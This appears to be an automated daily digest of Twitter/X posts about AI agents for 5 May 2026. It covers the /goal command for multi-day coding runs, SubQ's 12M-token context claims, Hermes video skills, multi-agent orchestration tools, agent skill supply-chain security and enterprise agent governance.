Twitter AI Agent - 2026-05-05¶

1. What People Are Talking About¶

1.1 The /goal Command Redefines Multi-Day Agent Runs 🡕¶

The day's highest-scoring post came from @AlexFinn declaring (349 likes, 38 replies, 424 bookmarks, 15209 views) that "/goal" is "the biggest advancement in AI coding this year" because "it allows your AI agent to quite literally work for days without stopping. You give a mission. It works until the mission is complete." The key insight: /goal is useless without a well-structured executive plan, shifting the bottleneck from model capability to prompt architecture.

AlexFinn thread on /goal command showing how executive plans drive multi-day agent runs

@cheddarmandem surfaced (23 likes, 30 bookmarks, 828 views) the OpenAI cookbook article on executive plan templates that work with /goal, linking directly to developers.openai.com. @Dimillian wrote (105 likes, 129 bookmarks, 13827 views) a long reflection on compound engineering: "the tech stack matters as much as the method," arguing that the right harness + model pairing determines whether multi-day runs succeed or burn budget.

OpenAI executive plan templates for the /goal command

Comparison to prior day: May 4 focused on the build-vs-buy harness engineering debate and the AHE paper's automated harness evolution. May 5 shifts the conversation to a specific product feature (/goal) that embodies what harness engineering enables in practice -- continuous multi-day execution with structured planning.

Discussion insight: The replies reveal a tension between /goal's power and its dependency on "executive plans" -- essentially, the bottleneck has moved from coding to writing good plans for agents, creating demand for plan templates and structured prompt architectures.

1.2 SubQ Ships 12M Token Context, Declares RAG Dead 🡕¶

@KateMillerGems proclaimed (997 likes, 39 replies, 4 bookmarks, 115309 views): "RIP RAG pipelines. RIP chunking hacks. RIP summarisation loops. They were never clever engineering. They were apologies for a broken foundation. SubQ shipped 12M tokens of the working context. The workarounds are over." The post's 115K views and 997 likes made it the most-viewed AI-agent post of the day.

@alex_whedon announced (47 likes, 72 bookmarks, 9393 views) SubQ's early access alongside SubQ Code, their coding agent. @willdepue pushed back technically (59 likes, 8 bookmarks, 2523 views): "Can you clarify the approximate complexity of your method? Is it O(n), O(n log n), O(n^k < 2)? What's stopping you from demoing 100M, 1B, even 10B context if truly subquadratic?"

Comparison to prior day: May 4 featured context engineering gaining structured vocabulary with architecture diagrams and workbooks. May 5 escalates with SubQ's specific product claim of 12M working tokens, framing it as a replacement for entire categories of infrastructure (RAG, chunking, summarization) rather than an incremental improvement.

Discussion insight: The skepticism from @willdepue about computational complexity signals the community is not accepting the "RAG is dead" claim at face value -- demanding proof of scalability characteristics before declaring victory over established patterns.

1.3 Hermes + HyperFrames Creates the Agent Video Stack 🡕¶

The Hermes ecosystem's video capability became a major thread. @AndyMarlowg celebrated (49 likes, 40 bookmarks, 8618 views): "Hermes runs anywhere. HyperFrames renders anywhere. now they ship together -- this is the agent video stack I wanted. hermes skills install hyperframes." @dr_cintas explained (23 likes, 21 bookmarks, 3013 views) the mechanics: "Describe the video you want. Your agent writes the HTML. It renders to MP4. No editor. No timeline."

@_0xpainn demonstrated (30 likes, 8 bookmarks, 233 views) the broader self-improving angle: "A self improving AI agent that runs on a $5/month VPS costs $0 per task. Free to run. Free per task. Forever. Rent a VPS for $5. Install Ollama. One command to install Hermes. Done. It creates reusable skills from every task." @MystiqueMide tested (14 likes, 175 views) voice mode on Discord, continuing the multi-modal expansion.

Comparison to prior day: May 4 saw the Hermes ecosystem expanding through desktop apps, Shopify skills, and MMORPG plugins. May 5 adds a video creation pipeline (HyperFrames) and voice mode, completing Hermes's evolution from text-only agent into a full multi-modal automation platform.

Discussion insight: Replies from @Feel594326 and @yafadec815 highlight that the community values "portability" -- the ability to run the same agent stack anywhere without vendor lock-in is a key differentiator for Hermes over proprietary alternatives.

1.4 Multi-Agent Orchestration Tools Formalize 🡕¶

@geminicli announced Scion (144 likes, 112 bookmarks, 6132 views): "a new multi-agent orchestration tool that orchestrates agents (Claude Code, Gemini CLI, Codex, and others) as isolated, concurrent processes. Each agent gets its own container, git worktree, and credentials." @daytradingzoo showed (23 likes, 25 bookmarks, 1562 views) a practical two-agent setup: "Claude - frontend, Codex - backend. Handovers, second-opinion reviews, github for alignment."

Two-agent setup showing Claude handling frontend and Codex handling backend with GitHub for alignment

@om_patel5 described (5 likes, 2 bookmarks, 395 views) a novel pattern: "two developers and two Claude Codes in the same chat room -- all four talking. Two humans and two AI agents in one conversation planning a feature together." @aakashgupta reported (8 likes, 24 bookmarks, 2902 views): "A 21-agent team running 4 parallel sprints inside Claude Code shipped from idea to App Store submission."

Comparison to prior day: May 4 discussed multi-agent coordination complexity as a frustration point (running "5-7 agents directly all day feels timid"). May 5 shows the tooling catching up -- Scion provides formal container isolation, while practitioners share concrete multi-agent workflows that actually work in production.

Discussion insight: @om_patel5 raises a critical warning: "two AI models can make each other sound more confident and hallucinate while quietly drifting from what you actually asked for" -- suggesting that multi-agent setups need explicit decision logs and human checkpoints to prevent collective drift.

1.5 HeyGen Agent Saturates the Async Communication Niche 🡕¶

The HeyGen + Superhuman Go integration generated volume across 15+ posts. @viipin8 captured (91 likes, 14 bookmarks, 11197 views) the pitch: "most updates fail because they don't land the first time so they get repeated in threads, meetings, follow-ups. Superhuman Go + HeyGen Agent turning them into video/voice feels like a clean way to fix that." @Parul_Gautam7 added (46 likes, 10 bookmarks, 6849 views): "Typing updates -- ignored. Meetings -- overkill. Now you can just say it."

@Logical_Girll noted (31 likes, 6 bookmarks, 610 views): "feels like the start of agents living inside your tools, not beside them." The coordinated amplification pattern (15+ accounts quoting the same @HeyGen announcement) was similar to May 4's launch pattern but with higher sustained engagement.

Comparison to prior day: May 4 noted the HeyGen + Superhuman Go launch as a "New and Notable" signal. May 5 shows the integration saturating the discourse with organic rephrasing and adoption signals, suggesting it resonated beyond the initial launch coordination.

1.6 Agent Skill Verification and Supply Chain Security 🡒¶

@omarsar0 published two key threads (21 likes, 34 bookmarks, 1703 views). The first on skill verification: "If you ship agent skills, your runtime is treating signed-and-cleared skills as trusted by default. This paper argues a skill is untrusted code until it is verified." He called for "SKILL.md before agent skill libraries become the next attack surface."

Paper diagram showing skills as verifiable deployment artifacts requiring gated verification

His second thread (105 likes, 170 bookmarks, 7371 views) covered HeavySkill's agentic harness design: "They argue that what actually drives agent harness performance is not the orchestration code. It's a single inner skill: parallel reasoning."

HeavySkill paper showing that inner skill design, not orchestration code, drives harness performance

@yzg75001 replied: "i've been running agent skills in production and the trust model is basically vibes-based rn -- signed skill = trusted, which is wild. we need something like sigstore for agent skills."

Comparison to prior day: May 4 identified agent security gaps (morse code exploits, $200K drained). May 5 elevates the conversation from "agents get hacked" to "the skill distribution layer itself is an attack surface," with a published paper proposing formal verification and @omarsar0 framing it as a supply-chain problem.

Discussion insight: @DylSwanepoel's reply crystallizes the shift: "Agent skills are not just prompts or convenience wrappers. They are executable artifacts. Once a skill can touch tools, data, money, or production systems, trust cannot be implied by where it came from."

1.7 Enterprise Agent Governance Deepens: ServiceNow + Microsoft 🡒¶

@ServiceNowNews announced (47 likes, 8 bookmarks, 3570 views) that "ServiceNow + Microsoft are unifying agent governance across both platforms." AI Control Tower now extends governance to Microsoft Agent 365, giving teams "one place to discover, approve, and manage agents." @Sam_Badawi provided (66 likes, 2 bookmarks, 4463 views) financial context: "$NOW is integrating its AI Control Tower with $MSFT Agent 365, expanding governance and visibility across AI agents operating within both ecosystems."

@Arkive_live reported (12 likes, 2 bookmarks, 44 views): "An internal AI agent at Meta recently leaked restricted employee data and org charts. Even tech giants struggle with governance when AI steps beyond controlled environments."

Comparison to prior day: May 4 featured Microsoft Agent 365 going GA and DeepMind's agent attack taxonomy. May 5 deepens the enterprise governance narrative with ServiceNow's cross-platform integration announcement and a concrete Meta data leak incident, reinforcing that governance is a live operational concern, not theoretical.

2. What Frustrates People¶

Token Cost and Optimization Complexity¶

@akshay_pachaar quantified (130 likes, 223 bookmarks, 24291 views) dramatic savings: "Claude Code used 3x fewer tokens with one change: Before: 10.4M tokens, 10 errors, $9.21. After: 3.7M tokens, 0 errors, $2.81." The fix was using "Insforge Skills + CLI as the backend context engineering layer" -- implying that out-of-the-box agent configurations burn money unnecessarily.

Multi-Agent Confidence Drift¶

@om_patel5 warned (5 likes, 2 bookmarks, 395 views) that in multi-agent setups "two AI models can make each other sound more confident and hallucinate while quietly drifting from what you actually asked for." The failure mode is subtle: each agent validates the other's output, creating a closed loop that looks correct but has departed from the original intent.

Skill Trust Model Is "Vibes-Based"¶

@yzg75001 admitted in a reply to @omarsar0: "i've been running agent skills in production and the trust model is basically vibes-based rn -- signed skill = trusted, which is wild. the supply chain attack vector is real." The gap between "shipped to marketplace" and "verified safe to execute" remains unresolved.

Demoware vs Production-Ready Agents¶

@databricks opened (53 likes, 18 bookmarks, 2717 views) with a blunt assessment: "Most 'agentic AI' is still demoware. Data work and coding are clear exceptions." @LandonExplr replied: "Agentic AI works where outputs are verifiable. Data pipelines qualify. Everything else claiming 'agentic' is still demoware."

3. What People Wish Existed¶

Inter-Agent Communication Pipes¶

@SaidAitmbarek described (12 likes, 1 bookmark, 206 views) his workflow of copying between ChatGPT and Codex and wished for: "a headless bridge (pipe) that streams data between agents (ad-hoc). Like OAuth, but for agents and with durable streams." The gap: no standard way for two agents from different providers to pass context back and forth in real time.

Skill Verification Infrastructure¶

@omarsar0 called for (21 likes, 34 bookmarks) "SKILL.md" -- a verification standard for agent skills similar to software supply chain attestation. @yzg75001 amplified: "we need something like sigstore for agent skills before someone ships a malicious skill that has write access to prod."

Context Scalability Proof Beyond 12M Tokens¶

@willdepue challenged (59 likes, 8 bookmarks) SubQ directly: "What's stopping you from demoing 100M, 1B, even 10B context if truly subquadratic?" The need: verifiable demonstration that long-context solutions actually scale, not just large-number claims without complexity analysis.

Agent-Native Permission and Identity Layers¶

@Arkive_live argued (12 likes) after the Meta leak: "Enterprises need intelligence layers with built-in permission boundaries and auditability from day one." The Meta incident proved that retrofitting governance onto existing agent deployments fails.

4. Tools and Methods in Use¶

Tool	Category	Sentiment	Strengths	Limitations
Claude Code + /goal	Coding agent	Positive	Multi-day autonomous runs, executive plan structure, subagents	Requires carefully written plans; useless without good prompts
Hermes Agent	Agent framework	Positive	HyperFrames video, voice mode, $5/mo VPS deployment, 100+ skills, 17 platforms	New skill trust model unverified; ecosystem quality variance
Scion	Multi-agent orchestrator	Positive	Container isolation per agent, git worktree separation, concurrent processes	Brand new; limited production track record
SubQ	Long-context engine	Polarized	Claims 12M working tokens; eliminates RAG/chunking	Complexity unproven; no public demo at 100M+ scale
Insforge Skills	Context engineering	Positive	3x token reduction on Claude Code; zero errors vs 10 errors baseline	Requires CLI familiarity; new ecosystem
Genie Code (Databricks)	Data agent	Positive	4+ years of harness tuning; Spark Declarative Pipelines; natural language	Limited to data engineering domain
OpenClaw	Agent platform	Positive	13,700+ skills in marketplace; per-agent model selection	Running it yourself is "still a nightmare" (per @cyrilXBT)
AG-UI Protocol	Agent protocol	Positive	Adopted by Google, AWS, Microsoft, LangChain, Mastra, TanStack	Protocol not runtime; requires implementation
DeepSeek TUI	Terminal coding agent	Emerging	1M context, sub-agents, keyboard-driven, git management	Less ecosystem support than Claude/Codex
Flue	Agent harness	Positive	One-click Render deploy; drop .ts file in agents/	TypeScript only; early stage

The standout shift: the tools conversation has moved from "which model is best" to "which orchestration layer minimizes token spend while maximizing autonomous run duration." Insforge's 3x token reduction and /goal's multi-day execution represent the new performance frontier.

5. What People Are Building¶

Project	Who built it	What it does	Problem it solves	Stack	Stage	Links
Scion	@geminicli	Multi-agent orchestrator with container isolation	Agents sharing state/credentials create blast radius	Containers, git worktrees, Claude/Gemini/Codex	Shipped	post
HyperFrames Skill	@HeyGen + @NousResearch	One-line video rendering from Hermes agent	Agents cannot create video without external editors	Hermes skills, HTML-to-MP4	Shipped	post
Entire CLI Skills	@ashtom / @EntireHQ	Teaches agents to use full commit context (prompts, transcripts, decisions)	Agents lack access to reasoning behind code changes	Open source, session-handoff	Shipped	post
Autoresearch v2	@AndrewK404	Long optimization runs with memory, async experiments, falsifiers	Karpathy's PoC lacks honesty enforcement in long runs	Agent swarm, memory layer	Shipped	post
AgenC Marketplace	@tetsuoarena	On-chain agent task marketplace across Claude/Codex/Hermes/MCP	Wallet authority mixed with untrusted task text	Solana, MCP, multiple agent CLIs	Devnet	post
AutoSwarm	@artemg314	Auto-optimizes entire multi-agent pipeline (30% to 90% on Terminal-Bench)	Individual agent optimization ignores team dynamics	Meta-agent, Terminal-Bench	Shipped	post
DAEMON Terminal	@DaemonTerminal	Agent IDE with local LLM, plugin marketplace, team workspaces	Fragmented agent tools, no collaboration	Ollama, LM Studio, plugins	Roadmap	post
Odysseus (VLM Gaming Agent)	@sethkarten	Finetuning VLMs to beat Mario via PPO reinforcement learning	Gaming agents lack reactive spatial reasoning	VLMs, PPO, Super Mario Land	Research	post
oh-my-agent-skills	@GT_Chiang	14 skills across 6 bundles -- execution logic for agent failure recovery	Agents fail without structured recovery paths	Skills SDK	Shipped	post
PEPT://BASE Hermes Skill	@peptbase	Structured peptide intelligence for biotech agent workflows	No agent-native peptide knowledge access	Hermes skills, 100+ peptides	Shipped	post
Obsidian Vault for Agent Memory	@tom_doerr	Persistent knowledge base accessible to coding agents	Agents lose context between sessions	Obsidian, agent integration	Shipped	post

6. New and Notable¶

Coinbase Cuts 14% and Mandates AI-Native Pods¶

@rohanpaul_ai analyzed (6 likes, 4 bookmarks, 2272 views) Brian Armstrong's memo announcing 14% layoffs plus "one-person teams" where engineers, designers, and PMs merge into single roles augmented by agent fleets. The framing: "AI has changed the smallest useful unit of software work from a team to a single high-context operator." This is the first major public company explicitly restructuring around agent capabilities rather than simply adding AI tooling.

Grok Build and Grok Terminal Enter the Coding Agent Race¶

@MarioNawfal reported (141 likes, 16 bookmarks, 33142 views): "Grok is done being just a chatbot. xAI is dropping Grok Build, a full coding agent, and Grok Terminal, straight from your command line." @testerlabor added (14 likes) that 3 Grok Build models are training simultaneously. The coding agent market gains another well-funded competitor.

xAI Launches Custom Voice Cloning for Agent APIs¶

@AlternativeTo reported (9 likes, 3 bookmarks, 1302 views) that xAI launched Custom Voices: "clone and deploy voices for Grok text-to-speech, apps, and Voice Agent APIs in under two minutes, with multilingual support." This lowers the barrier for voice agent personalization significantly.

TradingAgents Tops GitHub Finance Repos¶

@quantscience_ listed (72 likes, 121 bookmarks, 3521 views) the fastest growing GitHub finance repos: "TradingAgents (+7.9K stars) -- multi-agent LLM trading framework from UCLA/MIT with fundamental analyst, sentiment analyst, technicals, risk manager with DeepSeek V4 thinking."

GitHub trending finance repos showing TradingAgents at +7.9K stars

Ctx2Skill: Self-Evolving Skills via Multi-Agent Self-Play¶

@HuggingPapers shared (43 likes, 33 bookmarks, 2062 views) a new framework that "autonomously discovers skills from complex contexts through multi-agent self-play. No human labels or external feedback needed." Result: GPT-4.1 solve rates improved from 11.1% to 16.5% on CL-bench.

Ctx2Skill framework diagram showing multi-agent self-play skill discovery

7. Where the Opportunities Are¶

[+++] Agent skill verification and supply chain security. @omarsar0's "SKILL.md" framing, @yzg75001's admission that production trust is "vibes-based," and 13,700+ skills in OpenClaw's marketplace converge on a clear gap: no sigstore-equivalent for agent skills exists. Whoever builds verified skill attestation captures the trust layer as skill marketplaces scale.

[+++] Context engineering that eliminates token waste. @akshay_pachaar demonstrated 3x token reduction (10.4M to 3.7M) with zero errors via Insforge Skills. SubQ claims 12M tokens of working context. The pattern: context engineering layers that sit between the user and the model, structuring information to minimize redundant reasoning, represent the fastest-growing value capture point.

[++] Multi-agent orchestration with drift detection. Scion ships container isolation. @om_patel5 identifies confidence drift. @artemg314's AutoSwarm lifts multi-agent pipelines from 30% to 90%. The gap between "agents running in parallel" and "agents running in alignment" creates opportunity for coordination tools with built-in divergence detection.

[++] Agent-native video and voice production. HyperFrames + Hermes, HeyGen + Superhuman Go, xAI Custom Voices, and Deepgram + Together all shipped on the same day. The convergence signals that multi-modal agent output (not just text) is becoming table stakes, with opportunities in quality control, brand consistency, and automated editing.

[+] One-person team infrastructure. Coinbase's restructuring around "one-person teams" and @code_rams's "3-agent solo founder stack" both point to infrastructure that enables a single operator to manage agent fleets across research, content, and operations. Tools that make this pattern reliable (monitoring, handoffs, quality gates) have growing demand.

[+] Decentralized agent work marketplaces. AgenC, ShelleyBay, GenLayer, and Handshake trading skills all represent independent attempts at on-chain agent task marketplaces. The pattern is validated across multiple teams; execution and trust infrastructure will determine winners.

8. Takeaways¶

The /goal command makes "executive plan" quality the new bottleneck. AlexFinn's 2577-score post and 424 bookmarks prove the community recognizes that multi-day agent runs are possible but depend entirely on structured planning documents -- shifting the premium skill from "write good code" to "write good plans for agents." (source)
Context engineering is delivering measurable 3x cost reductions today. @akshay_pachaar's before/after (10.4M tokens/$9.21 vs 3.7M tokens/$2.81) with zero errors proves that context engineering layers are not theoretical -- they produce immediate, quantifiable savings for anyone running agents at scale. (source)
The skill ecosystem has outgrown its trust infrastructure. With 13,700+ skills in OpenClaw, HyperFrames shipping for Hermes, and practitioners admitting trust is "vibes-based," the agent skill layer is scaling distribution faster than verification. The supply-chain security framing from @omarsar0 is the early warning before the first major skill-based exploit. (source)
Multi-agent orchestration moved from concept to containerized product. Scion's container isolation per agent, @daytradingzoo's frontend/backend split, and @om_patel5's "4-person team" (2 humans + 2 Claudes) all demonstrate that multi-agent is now a practical workflow pattern, not a research curiosity -- but drift detection remains unsolved. (source)
Coinbase's 14% cut signals that "AI-native org structure" is now a public-company operating thesis. One-person teams, flattened hierarchies, and agent fleets are no longer blog posts -- they are driving layoff decisions at a $60B+ company. This will accelerate enterprise demand for agent management and governance tooling. (source)
The agent video stack arrived in a single day. HyperFrames, HeyGen + Superhuman, xAI Custom Voices, and Deepgram STT on Together all shipped on May 5. Agents are no longer text-in/text-out -- multi-modal output is becoming a default capability, collapsing previously separate tool categories into single-skill installs. (source)